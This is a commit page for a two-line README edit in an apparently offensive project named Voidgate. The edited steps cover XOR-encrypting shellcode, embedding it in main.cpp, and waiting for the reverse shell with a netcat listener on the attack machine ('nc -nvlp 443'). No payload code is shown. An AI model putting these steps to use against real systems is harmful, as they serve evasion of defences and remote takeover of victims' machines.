Update README.md

This commit is contained in:
vxCrypt0r
2024-06-12 00:28:05 -07:00
committed by GitHub
parent a091700d77
commit 73ec6e9dd4
+2 -2
View File
@@ -36,9 +36,9 @@ How to reproduce the POC:
```
./XorEncryptPayload.exe C:\Path\to\shell.asm
```
* 3.) Update it inside the main.cpp of Voidgate project
* 3.) Update the variable which contains the shellcode inside the main.cpp of Voidgate project
* 4.) Ensure the xor key matches the encryptor and Voidgate project
* 5.) Ensure your listener is waiting for the shellcode
* 5.) Ensure your listener is waiting on the attack machine:
```
nc -nvlp 443
```